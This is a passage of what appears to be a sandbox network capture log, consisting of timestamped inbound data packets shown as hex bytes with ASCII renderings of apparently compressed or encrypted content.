bd 9b 36 c9 13 fa e4 e4 8e 7d 90 cf dd 4c f8 a4 1c 95 56 30 73 d9 06 1f a9 b5 69 c3 99 d0 c9 05 2f b8 94 f6 fd f5 ee 67 27 00 dc 70 0c e4 56 7a 77 c6 Data Ascii: cQP)5v-G&e J+j}^JDH'NF@ux:-FZt_+Pa\L./)",4Dgy,42[iV{gs#\:.anb;hC]u/(GFi}$A6}LV0si/g'pVzw
2023-10-03 20:34:59 UTC	1729	IN	Data Raw: 6e 9d 64 c6 2e c7 14 00 a5 b6 de 56 74 ec 82 23 bd 86 a9 c7 fb 11 48 17 ce 0f a0 20 25 d7 48 c1 0a 00 bf 22 70 55 2b 73 44 c6 ba be 3d c3 1c df 1e bd 4e 6f 4f 5f c6 53 80 fc ed b0 d5 8f 1b a0 b6 71 11 4a 2f be 7e f9 41 bc 18 1f 03 9e 6e f3 78 79 97 e1 00 5d 5a 52 82 34 dd 83 69 66 b3 37 c7 03 30 a1 79 42 cb 7b ac 3b aa ba cd 2d c4 a3 a5 9d e9 13 84 b8 95 29 8f 00 2d f4 60 6a 99 d8 52 66 9f cb 19 ee e6 c1 db 13 16 b5 13 22 4a cb 2b 9f 90 4a b4 0e de 37 ca 56 72 97 48 5d 18 25 d1 c6 2b 36 b9 e5 55 07 ed 56 80 d3 bd 87 b5 68 ff c8 b5 7a 44 7a 13 05 38 a9 1c 9d ce ac 21 e5 9c fb 03 9b 6e ef 61 da ff 03 d4 36 89 3d 04 7d 80 f7 63 6e 45 ab d6 06 bd 8a ad bd 23 0c 12 67 8b 41 45 43 5c 7b 98 2e 82 9b 02 df 81 d4 52 4f 69 af 12 2c 18 6d da b7 e8 d1 3f 92 15 1b c0 Data Ascii: nd.Vt#H %H"pU+sD=NoO_SqJ/~Anxy]ZR4if70yB{;-)-`jRf"J+J7VrH]%+6UVhzDz8!na6=}cnE#gAEC\{.ROi,m?
2023-10-03 20:34:59 UTC	1745	IN	Data Raw: 80 97 76 96 94 30 74 19 68 52 69 c1 fd 43 15 7a ef 5c a0 11 eb 00 dc 4f 1d a7 96 a7 cb 2f 28 58 48 cf 3a 4f 2d c8 96 97 c6 0e b0 cc bd f3 75 8d 15 b6 a4 a6 38 62 5c e6 ed 4a bb c6 b3 11 c4 f4 35 6d 5b 77 ce 76 92 9e c2 a9 34 d3 4b 6d 94 e2 66 49 70 06 75 55 f9 33 57 7f ca da 11 b7 77 2e 55 35 b0 4e 8a cc d7 e9 53 49 12 7a 98 e3 00 cc 1c 59 7a 1f 06 96 1d 28 79 43 2f 6e 67 10 26 26 ed ab ac 99 3a 0f 90 d2 a8 92 f6 ce 74 99 b1 29 33 54 7a c7 13 fc 9b c4 f9 7c 96 02 74 a4 84 ad 80 c4 0a 4b cd 67 a6 f9 54 5b 6d e8 16 ca 6a 99 7b 25 cb b0 cb 47 f5 39 af df 53 f5 18 56 78 a3 7c 15 9e 23 25 74 f5 a9 3f 8a 33 40 7d d9 b9 f6 12 03 7d 45 9d 3c 83 84 39 c7 96 9f 65 d4 1a 79 3f d6 a2 1e 67 3a 9a 67 e7 15 49 5c 7d c1 ae 03 dd ac ab 40 8d 9b 27 0e 16 6c 38 46 bd a9 96 Data Ascii: v0thRiCz\O/(XH:O-u8b\J5m[wv4KmfIpuU3Ww.U5NSIzYz(yC/ng&&:t)3Tz\|tKgT[mj{%G9SVx\|#%t?3@}}E<9ey?g:gI\}@'l8F
2023-10-03 20:34:59 UTC	1761	IN	Data Raw: 6e 64 c6 e9 7b d0 8f 2b 80 6f bb 93 7e ce 8c 98 1e 0f 92 04 9f 2f 3b 50 f3 47 19 ca 1b e7 55 84 92 3a aa 34 54 e2 ea 3e a4 f5 a0 1f 23 24 99 d1 53 d0 6f 0f 6a a5 9f fa 49 71 35 b2 c2 b5 2a 87 12 31 66 c0 63 e0 1d f2 9f 62 c5 40 e5 7f 97 f1 c4 f1 f7 87 ca 7e a3 03 0a 4c c3 2f 0e 71 40 3f 34 36 82 b5 b9 45 a3 47 5a 7e e3 e3 44 4d 7a 92 ed 01 a5 fd 3f 24 9e 88 30 1b 23 17 cc 9d b7 14 17 54 75 92 a0 ad 29 84 d5 c2 ed 5f ce 62 52 f2 48 1f c7 c7 9a f2 23 7d d0 28 11 f7 07 d6 85 04 9f 06 31 38 3f 6d 7e f5 39 ad c1 36 9e 58 59 02 f9 83 3a 8a 58 57 38 8b b1 3a 28 ba ae aa f0 4a 34 b6 12 b2 e9 30 aa 17 9f 84 10 8d aa 8c f8 fa a0 67 36 dc d6 78 55 cf ef b1 9f 94 30 f4 c1 86 78 7f e6 42 e1 2a e6 e2 51 55 e7 c9 56 d2 22 d5 dd b6 27 fd ba 58 e2 7f 08 71 0b 7e 1f 16 21 Data Ascii: nd{+o~/;PGU:4T>#$SojIq51fcb@~L/q@?46EGZ~DMz?$0#Tu)_bRH#}(18?m~96XY:XW8:(J40g6xU0xBQUV"'Xq~!
2023-10-03 20:34:59 UTC	1777	IN	Data Raw: e4 b4 fe a0 2d 41 ad 38 25 23 f5 bc 26 f6 e9 e7 d5 7b cb a5 b4 b0 4c d1 cf 37 ba d0 0a 59 7b 26 93 33 ec 8b 51 cd 37 50 7d e6 b4 80 8c 8c c9 1c a8 4f 30 ad 78 8e 47 9b 6f 12 21 12 ae 21 e2 1e a3 d4 68 6c 99 85 d3 a6 ba 90 38 09 cd bc 1d fe 49 aa 32 44 54 e1 a1 8c c6 94 2a 87 12 dd 38 3f 5f aa 50 38 d2 df a1 fc 26 28 59 0f 13 70 a3 1b fd 17 ae 87 b1 d7 32 38 07 45 41 43 55 22 c9 46 64 58 c5 e1 af 56 e8 8a 9c e1 3e 53 61 bb 9f 79 25 34 94 c3 b9 46 ec 54 b4 04 7c 9f 67 99 f6 bf 5d 53 f7 75 f5 3a af 14 b6 f9 39 3d 51 5a e1 1f cb dd 5d d6 e3 1c 36 58 8a 0d 0e a3 51 ec 25 65 59 39 5e 87 40 93 ed 2a 74 da 1e 38 20 84 a1 a2 59 5d 7b 25 6c e8 d5 46 1c 50 a3 bb ff 17 9c 29 b8 99 06 b3 09 2d 60 7b 40 4a a3 cd 52 ed 88 de c0 a6 12 4b 07 a3 c5 ca 8b 1f 22 3f e9 38 dd Data Ascii: -A8%#&{L7Y{&3Q7P}O0xGo!!hl8I2DT8?_P8&(Yp28EACU"FdXV>Say%4FT\|g]Su:9=QZ]6XQ%eY9^@t8 Y]{%lFP)-`{@JRK"?8
2023-10-03 20:34:59 UTC	1793	IN	Data Raw: be 68 67 cb c4 58 6d 67 e4 28 96 67 ff 80 a4 fb a5 62 04 dd ec df 78 d0 ba 1e 19 cf 7a dc 70 94 7e a0 cd 19 c5 b1 a1 51 2d e1 9a ef 25 4b 0d 54 c5 11 3c fd 0c 74 ab 63 0c b5 cb a8 01 1b b5 87 66 7b ea 27 ce cc 72 98 e3 6c 02 c7 91 1e a9 cb 97 c9 36 5a 56 ea 7a 9b a1 da 6e ef 7a 0c cf 73 93 0b b6 2f 6d ba 79 90 a1 4a f5 91 27 2e 4b ab 4d ba 75 84 12 a6 2b a2 85 90 2a af bd e3 fd 5d 0f 54 51 6d fd 9e 15 e7 71 ed 09 39 9a 44 33 c0 1d e7 70 ce d2 19 fc 4e 19 2c 8d 3f 84 6c 24 8e bf 2e 7d 2c d9 43 f4 32 c7 1a ac 6d 58 aa 0b 79 34 17 ee 84 d8 14 61 a8 b5 57 7d ab b1 ee 6d 55 85 46 ef ed eb 00 e4 14 d8 d3 35 00 20 00 80 76 22 1b ce 69 1f 74 c3 bd 37 4a 46 93 43 0a 69 58 0e a9 f5 ee 45 20 66 aa fd ad a4 c6 1f 55 ff 20 5b d4 ad 74 b2 b5 71 9c ee 01 2f 84 57 b4 fc Data Ascii: hgXmg(gbxzp~Q-%KT<tcf{'rl6ZVznzs/myJ'.KMu+*]TQmq9D3pN,?l$.},C2mXy4aW}mUF5 v"it7JFCiXE fU [tq/W
2023-10-03 20:34:59 UTC	1809	IN	Data Raw: b7 c2 0e 5d 3d 16 8f 43 2e 90 98 dd 81 3e bc 12 5e ed af 9a 77 b5 5f 44 af b7 9f 8f 21 e7 30 f6 92 c4 4e 68 36 d0 fe 0d 75 af 52 17 d7 4e 67 df eb 8f a5 fd 8e 30 b9 61 dc c5 fc 63 27 2d ad af a2 19 5a f5 31 54 31 47 08 40 6d 6a bf dd 6d 18 da d3 9e 9e cc 7d eb 6f 5a ea 41 79 e6 ba 4e 83 de bf 0e 65 c0 b1 73 92 79 e6 3a d6 ad 41 a7 e5 63 de 4b 32 a6 6f b9 fb 3d 9f 09 4c f5 ab ff c6 d8 f2 34 d5 5b 87 b6 f3 73 57 6f 7d bb 55 53 67 86 f7 d7 0f b7 b2 27 f2 cb 7b 8c 30 04 72 48 fa f8 a2 9c 0d 13 b4 79 7b 64 5a fe 1f ed 4c d7 d7 6a bc da ca a3 68 f2 49 14 77 df a0 1d a8 df 19 14 75 55 7d 77 8e 6e a5 e8 4f b9 7b 1e a1 76 f5 75 b5 9c af cb 6c ea dd 12 5e 4e 66 f1 59 8e 4a ba 59 0f a4 6a f4 31 d2 62 87 99 39 a9 98 ea 6d 49 fa 37 f6 15 e9 4b 28 55 3b 32 57 07 aa ac Data Ascii: ]=C.>^w_D!0Nh6uRNg0ac'-Z1T1G@mjm}oZAyNesy:AcK2o=L4[sWo}USg'{0rHy{dZLjhIwuU}wnO{vul^NfYJYj1b9mI7K(U;2W
2023-10-03 20:34:59 UTC	1825	IN	Data Raw: 00 60 d4 90 ae 64 4d c1 ba e0 67 c4 a4 79 d0 33 a5 82 a7 c2 d5 68 9b 02 28 42 98 a9 32 e5 de 8b 6f f7 8f 0b 31 3b 56 ca 9a c2 39 68 94 2b 0f ed fe 67 b9 87 e2 9e c8 44 71 56 6c ba 54 52 f1 38 05 47 b8 c3 e8 0f c5 8a 4d b2 18 3e 94 60 f1 8e 71 22 5c ab 96 bc a2 8b 52 2d 9c e2 75 7a 88 17 d6 92 8a c5 01 16 49 a1 e2 71 7b c7 50 eb 37 87 7e 16 ae bb 29 66 6e b4 b0 b9 e3 c3 b1 38 26 a0 84 01 a4 4d c5 91 ac 6e b1 f7 9b ce 6d 8a a7 22 1e e7 7d 98 9b cd fa ea ba 6f b7 51 3d 76 f0 96 a7 6d da 7f ce 5d 30 b7 81 99 2e d5 9d dc 60 6e 44 4a 65 52 51 77 ec b3 57 7a 6e 7e 31 46 29 60 00 83 c0 41 d5 8d c6 8d b9 29 89 09 4a 2a ae 6e 73 3b 7d 7e ec 06 bb db 19 60 61 ae d9 8a 4c 8a 74 4a 58 a3 15 45 24 4d 3b a0 7b e7 69 94 2c 9a 02 37 82 60 38 ae 36 10 8b 98 81 c5 ec 68 19 Data Ascii: `dMgy3h(B2o1;V9h+gDqVlTR8GM>`q"\R-uzIq{P7~)fn8&Mnm"}oQ=vm]0.`nDJeRQwWzn~1F)`A)J*ns;}~`aLtJXE$M;{i,7`86h
2023-10-03 20:34:59 UTC	1841	IN	Data Raw: 50 50 8c 02 ce 58 1c 8e a0 10 09 09 95 a0 a8 5a 8a f0 15 3a ee fc 60 42 35 06 09 c2 23 8c 32 68 89 09 9a a3 f8 80 0a 0e ac 5c 68 d8 45 63 74 32 16 f9 a1 58 13 a1 36 42 32 86 b1 17 81 e2 0d 27 6c 9e a2 c1 39 18 78 b2 51 88 45 4a 95 d4 96 c9 74 89 91 25 7a 58 20 a8 45 05 5c 62 f8 3c c6 83 75 86 46 6c a8 03 fe 90 a1 07 36 4a 48 42 a9 2f a4 98 a8 d7 e1 5a 0d c8 26 08 41 a0 62 74 11 c2 25 39 7c 5b 61 41 17 11 8e 17 3f 90 b4 31 07 0e 43 ee a2 70 2f 9f 91 fc 09 73 91 c6 58 76 5c 69 26 01 57 56 c4 42 c7 06 1f 26 a0 47 58 22 5e d1 8c e1 ec 18 6b 66 04 1b 12 a1 d0 f8 0a 19 78 02 91 4e 16 2a 2b 2d 31 a8 45 b4 a2 59 8c 78 86 1e 2b e1 54 8a 40 d8 a0 82 25 29 6e c2 e2 e2 2d 2f f6 a6 e3 a1 19 21 04 0b 89 13 15 28 64 c8 82 03 2f 32 10 69 08 b8 c6 12 43 66 96 62 29 89 ba Data Ascii: PPXZ:`B5#2h\hEct2X6B2'l9xQEJt%zX E\b<uFl6JHB/Z&Abt%9\|[aA?1Cp/sXv\i&WVB&GX"^kfxN*+-1EYx+T@%)n-/!(d/2iCfb)
2023-10-03 20:34:59 UTC	1857	IN	Data Raw: dd 65 4b 97 bd 70 c8 c9 f8 d7 cd 7a 66 d7 08 47 1d e6 1d 05 c5 8d cd e9 ae 3b c9 c4 c5 90 6c 78 ca da 26 07 6e f7 1c 71 71 dc 7f d7 f0 5d 5b 08 b9 65 51 22 bb fe dc a1 12 fa 0c 23 19 1d 07 eb 7e 48 b8 f2 1b 7a e0 50 c4 c6 30 ce 7c 82 8e 55 a2 05 3b 67 74 d0 ae 74 f1 e7 b7 c4 4c 84 32 b1 f4 5c 63 f9 bd b0 82 87 ab da 97 6f a0 0c 7a e4 1b 8a 12 46 78 be 69 f6 21 88 8f 2c 8f 43 7d 7f a5 54 87 5e e5 b2 8f 65 9a 3c 09 8b 81 4e fa 22 36 a5 9d c2 2e 88 f6 90 66 ab 9a dc ce 6a 4d 1a 76 7d 7d 71 e7 30 a6 65 58 e9 78 5c b6 16 72 92 0a 9d c6 a2 2d fd c4 e1 d1 b3 bb 63 22 47 fb ed 8f ad fd 03 9b e4 ba a3 7c 60 37 49 a9 94 bc 5c 94 5d 6d 7c 8d 59 67 b1 67 e1 98 7b 60 1c 7c 91 bb 92 e6 90 1f 87 59 1e ce 67 ea b1 23 3d ca 05 13 7a 8a ae 07 13 a1 f4 ab 12 12 49 8e 19 ff Data Ascii: eKpzfG;lx&nqq][eQ"#~HzP0\|U;gttL2\cozFxi!,C}T^e<N"6.fjMv}}q0eXx\r-c"G\|`7I\]m\|Ygg{`\|Yg#=zI
2023-10-03 20:34:59 UTC	1873	IN	Data Raw: 0f 9f e1 3c 84 44 cf 2d 91 23 ed e7 91 8a 11 f8 da 50 39 c9 70 bc a5 ff db 32 6f 93 b0 8e 43 77 76 1d 7c 04 13 c5 69 f6 71 b2 9b ca 14 bd 2b 3d db ef 1c 1c c4 1e b9 c0 4f 94 32 7b bb e8 be 3c 75 9d 36 cc 83 fb cc c0 af ae a9 28 a6 12 db 5a 2f 9e 4d bb 52 da 70 84 11 84 ed 5b 3c cd 19 26 08 5c 56 c6 cb 3d fe e2 96 f4 d9 d6 ed 65 21 97 49 3e 16 c6 20 d7 ca d2 af 64 6b ba 29 e9 8a e6 1b 63 2c 53 f7 6d bc d7 44 29 2a 2e 53 af ae 8e dd 56 f7 db 28 be a1 ef 8b 9b d7 fa e9 f4 65 94 36 b8 37 fd 35 fa 73 08 fb 2b 8e 0e 73 37 ff 8a 52 eb 10 98 25 d1 69 9c 99 50 59 75 a4 af 04 c9 4f 7a e7 24 52 ce b7 f8 e2 4e dd 61 97 b5 22 20 34 f3 39 d8 c1 2a ee d5 d8 f6 72 5d a8 03 2b e0 0c 25 e1 5e 4a b8 32 1e ae aa cb c9 83 c2 51 b8 6d b2 53 f1 47 39 ce 5a 3f 45 13 72 8e c8 6a Data Ascii: <D-#P9p2oCwv\|iq+=O2{<u6(Z/MRp[<&\V=e!I> dk)c,SmD).SV(e675s+s7R%iPYuOz$RNa" 49r]+%^J2QmSG9Z?Erj
2023-10-03 20:34:59 UTC	1889	IN	Data Raw: 83 a8 0e 04 3e 88 21 cc 9f 88 19 0c 10 20 c4 62 06 03 1c 34 31 de 84 71 7e d4 09 6c 3e fe 2e df e7 4c b2 3d f5 1b c0 fa 90 b9 ca 0b f8 d0 14 3c 18 1f fc da c8 07 c3 ad a0 5a 31 4a 60 5a 01 f4 60 a6 15 4c 2b c0 09 4c 2b 82 1e c5 b4 81 69 05 44 83 69 56 d0 ad 98 73 d0 c0 ee 99 56 05 8d 8a 69 07 dd fc 64 0b df 52 a3 bf dc 87 18 48 00 6b 10 cf cd 36 ac 69 33 a3 db 11 b8 91 38 11 39 91 39 11 3a 91 3a 91 3b 0f 3c 87 03 3e 00 bf cb 99 1c f5 14 78 21 8d 17 a9 cb 99 2e ce e3 9c 87 7a 80 43 e1 10 df 32 1f f7 41 0f 8e 88 dc e4 7f 14 db ab fc ff b8 ad 00 df ac 2c b2 a4 f7 7f 31 4f 91 7f 9b 83 c8 30 b4 20 24 42 c8 8a 90 20 21 a8 83 ee 94 c4 69 01 85 22 0a 84 14 08 2a f7 b9 0e 22 c9 c3 e7 5d 45 47 ab 87 db a3 a9 48 04 b1 85 fc ec 46 f5 4f 7a 99 02 c8 3d 10 26 1d 2b de Data Ascii: >! b41q~l>.L=<Z1J`Z`L+L+iDiVsVidRHk6i3899::;<>x!.zC2A,1O0 $B !i"*"]EGHFOz=&+
2023-10-03 20:34:59 UTC	1905	IN	Data Raw: c6 e3 46 d1 8d de 8d bf 8d b9 1b 82 1b aa 35 fb 4a 7b 68 b8 b1 68 63 a2 8d 88 36 23 da 8d 68 36 a2 da 88 68 23 95 8d 5f 59 87 b3 bd bb fa 87 d1 46 af 1b d7 4a 75 65 4d 8d 99 e1 b4 ca 37 da 0f 9b 36 86 b3 55 9a 6a fd df b7 11 77 a3 70 e3 ee 46 c3 1f 73 98 b1 0f ba 2f 1b 01 97 d3 00 f3 ef 2f f9 a9 18 19 c6 d5 e3 f9 1b 7a 93 ff ec 7f fb ef fe 7b ff ce df dc 71 fc 14 93 dc 3e 7f bb 49 6f 8f fb cc db fc 6f 78 48 e8 72 f1 db d1 bb b8 bd 51 dc a3 b8 66 63 d0 57 f2 4b 46 00 8d df 37 e2 11 fc 52 bf 65 65 be d1 db f8 6b 82 7c df e0 81 b1 a9 ae c2 f9 33 9e b1 19 5f 98 cc ab cd ce 8c 66 6c c6 17 4c 5c 65 65 50 c6 64 6c c6 a7 4c 44 e5 63 38 c6 63 6c c6 27 4c 2c 65 62 20 c6 61 6c c6 a7 49 14 45 30 4f 55 c2 8a a5 a4 53 6d 3c e1 9d da 51 1e aa 6d d5 49 1f 5d 52 7b b4 4c Data Ascii: F5J{hhc6#h6h#_YFJueM76UjwpFs//z{q>IooxHrQfcWKF7Reek\|3_flL\eePdlLDc8cl'L,eb alIE0OUSm<QmI]R{L
2023-10-03 20:34:59 UTC	1921	IN	Data Raw: 86 12 c0 66 22 dc 3a c6 f2 8b 69 6b b4 ba f4 22 96 39 28 63 fb 8d 9d 10 1f 49 3e 47 ba 42 ca 29 58 65 1b 60 c0 5b 23 a3 86 6f 1f 7b b3 c8 c4 6e 27 c0 a1 94 58 04 51 ec 96 62 65 b4 c0 da 2f dd 4a 11 6c 1f ab b6 50 0b ae 4b 51 00 c1 26 5a 30 71 ee ed 04 f6 ac 98 05 03 0f 2e 10 8e 39 fe 4c 41 7c c8 02 e6 c4 65 4f 02 d0 13 d7 aa 75 de 4b 7a fd a4 5c ef 13 cc a9 9a 6b 54 79 c1 64 f1 67 c8 ae c7 5e f7 93 31 a1 01 01 ac 7f f1 5b 81 a8 36 93 4d 75 4f fa 8b d2 6e bb 3b 6c 58 b2 9b 78 8c fd 9c b5 90 66 c0 96 a7 df ad 3a 30 a0 30 0b 91 aa 3a 10 e2 0f 3e da 27 57 6b d1 15 a0 6d 8d 46 e7 7b 1d 21 7d 15 7c 5e 4d b4 c6 d8 53 bd 1b 7f 81 9b 20 5a 7e 0c a4 c1 56 1a 21 e6 a5 28 3f dd 11 c3 68 be 6d 99 ba 11 bf af 01 79 c3 5f 43 c7 dc a5 ef b8 29 4c 6a fa e8 64 e7 12 42 9d Data Ascii: f":ik"9(cI>GB)Xe`[#o{n'XQbe/JlPKQ&Z0q.9LA\|eOuKz\kTydg^1[6MuOn;lXxf:00:>'WkmF{!}\|^MS Z~V!(?hmy_C)LjdB
2023-10-03 20:34:59 UTC	1937	IN	Data Raw: 76 51 3e 23 f7 85 ba c4 ee b5 5b c1 3c 23 38 d8 0f df fe ed 69 55 3e c5 42 04 60 d9 cd 6a 4f 8f d1 b0 96 75 d9 fe 29 c8 8f d8 bb ee 7c da 9b 13 c9 64 e9 a9 65 72 2d c1 68 2a 5c 1f 2c 2e 04 48 8d b1 2c af 28 77 9c e6 08 31 16 b8 3f 7a 96 a5 81 db cf 77 6c 82 18 9a 6f db 85 d0 89 f5 50 35 d8 89 63 a2 b7 25 c1 bf 20 b5 cb 7b cd 86 af 00 65 eb 8d 91 f3 cb f0 47 2e c6 6e 14 f3 02 dc de 6d 50 20 19 44 69 ed 67 b3 23 ea 1c 17 7a 03 e0 37 dc d5 37 bb 3c f6 03 d3 0d f5 e3 14 5b e0 d2 ef 5f 6d 46 9b 01 b6 6d 6c c9 dc d9 c4 fa 15 f5 50 20 42 db 8f a7 fb 19 56 0b 7e c7 13 17 e8 be 3d dd e9 87 a7 fd b5 a5 4b 6f 8b fb 01 d1 a9 3c fb 14 20 39 ee 9e 3c 95 75 57 a0 1d 8e 94 ff f3 33 48 f4 3d 31 7d 65 8d 7a 28 12 3c 68 b7 20 3f a3 f6 43 d5 99 b5 67 d2 e2 98 eb 56 47 10 b7 Data Ascii: vQ>#[<#8iU>B`jOu)\|der-h*\,.H,(w1?zwloP5c% {eG.nmP Dig#z77<[_mFmlP BV~=Ko< 9<uW3H=1}ez(<h ?CgVG
2023-10-03 20:34:59 UTC	1953	IN	Data Raw: 19 a6 7b f6 68 03 03 30 48 69 ea 97 d6 7b 59 47 97 9f 36 04 85 63 70 a2 50 e2 7a cb b7 cd 0c e3 a7 1a c0 50 f6 8b f7 4a 7b 91 68 a5 3c 1a 1f c9 5e 20 26 9e 79 10 5b 5f 3b 0b 0f 09 5a 75 8b 13 48 06 5b d7 c2 75 9f 2b 27 f4 f6 69 51 52 1e 4e 04 36 b4 bf 41 f7 a1 72 d1 75 61 1d 4c 46 4c e5 83 aa 41 d8 84 a1 b3 05 4f 3b 66 62 af c0 6c 08 47 ea f7 3a 60 53 77 59 72 bb 4a da 52 68 6e 1b fc 73 db 56 50 d8 52 18 d0 44 cc 0d b3 0d 3b 40 4e 69 ac ed c6 e5 2f 28 e3 ca 30 34 e1 4e 75 dd d3 ac c3 1e 82 3c 6b 36 ee a3 ea b6 8c 0b dc 1c eb 3e 4d f9 02 21 68 b1 fb 7e 6d 2b f4 f2 26 9a 03 5f 45 7c 42 9b f9 e2 18 c7 b0 b8 c0 fa 19 bf f6 92 96 fc 7d ee d3 0f 36 7b 2b f2 a8 c1 03 72 1a c6 58 cb 35 ce b9 21 af c7 2b 1d bc c3 04 3f 6f 73 e0 b3 85 cc df fa 5b 1c 79 a1 1c 26 e5 Data Ascii: {h0Hi{YG6cpPzPJ{h<^ &y[_;ZuH[u+'iQRN6AruaLFLAO;fblG:`SwYrJRhnsVPRD;@Ni/(04Nu<k6>M!h~m+&_E\|B}6{+rX5!+?os[y&
2023-10-03 20:34:59 UTC	1969	IN	Data Raw: 44 fd da 96 41 25 9c ef 4f 02 c8 7e da 6b b1 23 8c 7c 77 0b 15 0f 4e 8a 4e f1 ea f9 c7 16 75 c2 c7 a0 2e 90 6f 0f f7 d6 1f 2b b1 94 ed 0e 45 85 c9 2f d0 07 ea b0 db 8d 9f 63 94 09 04 03 f4 b8 aa dd 7e 7f 04 0f 3e 43 d1 96 fe 6d df a2 05 67 57 2d dd 80 45 f4 bc 0c e1 25 ec ae ae c4 79 b3 ca 00 4d 6c 78 ae ac 24 8a 9f a0 1c f6 8a fb 0d b8 d2 53 72 d1 66 f1 f0 e0 dc 89 85 5d a2 13 be 82 0f fe 23 d6 ac b0 81 5e 78 c0 34 06 84 1c 55 cd 1a 76 90 9b 67 2d c5 51 a6 f4 c5 44 3c 96 2b b6 19 10 c3 bf 57 d9 4b fa 20 f3 bc 29 cf 92 c4 dd f6 85 fd 3f 33 06 2f 1c b9 58 7f 90 98 5e c6 8f f0 65 ec 6f bf f8 32 94 d0 d7 09 3f 61 82 cb 6d 77 8d 84 ef 3b f0 0a f9 23 61 33 d7 5d c4 37 48 8f 6c df 2c a6 0a fb e1 09 46 2b 63 7c 11 39 2f 52 3f 82 95 49 b8 09 04 a9 f4 ac 00 3d 24 Data Ascii: DA%O~k#\|wNNu.o+E/c~>CmgW-E%yMlx$Srf]#^x4Uvg-QD<+WK )?3/X^eo2?amw;#a3]7Hl,F+c\|9/R?I=$
2023-10-03 20:34:59 UTC	1985	IN	Data Raw: c3 98 7d 01 70 a5 d3 56 16 bc 51 cf 61 38 f2 18 fd 0c fe c8 67 b6 a8 2f 0b 44 46 be b4 d0 cc 2a 7f 46 44 8d 9c e1 75 78 cc 34 8a 9f 30 60 b6 b4 6f ce 12 ff 8b fb 90 72 61 66 55 0a d7 05 75 49 b0 f6 04 80 29 f6 d6 6b a1 79 ea eb 1f b7 ab 6a 9d d2 e9 9a 24 6a 0d cc db 82 8e 08 2c c1 ca 3d ef f1 de e5 7c 23 88 5c ab 4e f4 1e c8 27 b8 07 5e a4 57 6f 98 48 fe e7 87 38 e8 6f 8c 5d e3 f6 ea 4a 21 7a d6 72 1b cd 52 48 d4 2c be 6f da a4 70 9b a9 a9 41 77 1a 05 9c 89 31 3b 3d 43 81 e4 88 80 dd 96 71 16 e3 0e 45 0f f9 8f 6f fd 3d 28 46 f0 9f 03 e5 3e 78 5f a2 05 6f 0c 87 b4 8c f1 a2 8e b2 e6 25 48 f2 81 6e 35 de bc 66 0e 72 c2 41 73 71 0a e1 4b 19 03 ec 1e 88 9c be c0 fa e3 9f 7d af c1 80 36 42 57 fe 9a 04 62 c7 60 74 0a e3 d4 97 7f bf e1 d2 ea bc 0f ba 6d 27 07 11 Data Ascii: }pVQa8g/DF*FDux40`orafUuI)kyj$j,=\|#\N'^WoH8o]J!zrRH,opAw1;=CqEo=(F>x_o%Hn5frAsqK}6BWb`tm'
2023-10-03 20:34:59 UTC	2001	IN	Data Raw: ad a3 cd 5c c8 dd 56 59 a3 ad c9 92 f5 e2 25 22 44 07 88 8b 96 bf 11 7e 0c 3a 21 94 21 14 d0 9d 34 c2 f1 8a 4c b9 27 66 66 68 2a 11 51 4a 67 f8 2c 46 62 a0 e9 1d 62 2e 5e 64 24 62 23 64 18 bd 17 10 d1 99 75 b7 98 19 bf 5d c5 f3 45 19 cc 36 66 22 da 35 44 59 db d0 6d e4 72 b3 b1 58 2d a1 27 cd cd 3d 30 99 68 6a b4 90 3b 96 af 54 c2 c4 f5 2e f6 45 f8 43 9b 83 55 b9 d6 84 8d 5a 18 41 cc 47 c3 f5 29 43 b4 3b d1 80 38 c9 d8 20 36 5c 3e c8 b9 72 be 9d 41 48 2e 1a 13 12 d3 98 3c e4 1c dd ce 9d d1 78 ab 50 55 e1 c7 c4 bb 46 e4 8b 78 18 19 5d 9e d6 34 54 bb 44 40 8d 30 95 c3 4a 81 c0 a1 e6 bd 3c 2e 5c 36 00 80 d2 bd a4 e5 57 c4 47 b2 36 b0 ad e0 8f bd 97 8c 19 56 20 78 0a 0a 42 d1 f1 b4 e8 cb bb 87 ce 85 c9 14 9c e0 da 5c 99 91 f5 36 e7 6c 1b 86 57 1e ac 14 40 cf Data Ascii: \VY%"D~:!!4L'ffh*QJg,Fbb.^d$b#du]E6f"5DYmrX-'=0hj;T.ECUZAG)C;8 6\>rAH.<xPUFx]4TD@0J<.\6WG6V xB\6lW@
2023-10-03 20:34:59 UTC	2017	IN	Data Raw: 96 90 19 dc 24 49 b0 fc 8c bd 20 7c d9 10 39 62 92 84 20 30 0e ce b7 07 a6 d5 a4 5a 70 55 60 08 44 30 1e a5 c1 ac 82 e9 5e 8d c4 9b 24 0b 3a 28 a8 08 92 3f 10 5f a4 f3 e1 e0 3f 6c 8c 08 06 e2 40 7c 0b 6e e1 33 23 05 89 a8 d8 f0 09 7c 41 f8 12 20 71 35 9b b6 e0 02 31 ff 07 ab c5 10 b6 23 7a 01 68 44 5c 61 50 c1 03 f9 45 5b fd ce cf a3 24 03 47 4c 27 9b bc 82 0d 3c 10 c5 5c 11 bf fa 99 3e 23 6e 95 65 b6 54 40 b9 a0 01 28 20 04 a3 77 f8 06 24 ac 90 91 da 40 03 14 10 82 a0 3e 47 c1 26 05 0b a0 50 4c 08 1a fa 40 d5 82 5f da 24 78 b0 d9 c8 71 18 00 ef 40 6a 54 97 60 18 12 25 e0 20 03 0e 84 5d f8 b7 91 a8 3a 04 1f 7f 20 bf a8 0a 69 d3 32 4d 1f 0a 16 06 38 1c 94 82 d2 42 50 d1 07 ae 16 40 f5 0a e8 2f cd 90 d4 30 0d 01 0e 58 41 03 21 86 fc 81 0f 92 15 bd 93 cd 0d Data Ascii: $I \|9b 0ZpU`D0^$:(?_?l@\|n3#\|A q51#zhD\aPE[$GL'<\>#neT@( w$@>G&PL@_$xq@jT`% ]: i2M8BP@/0XA!
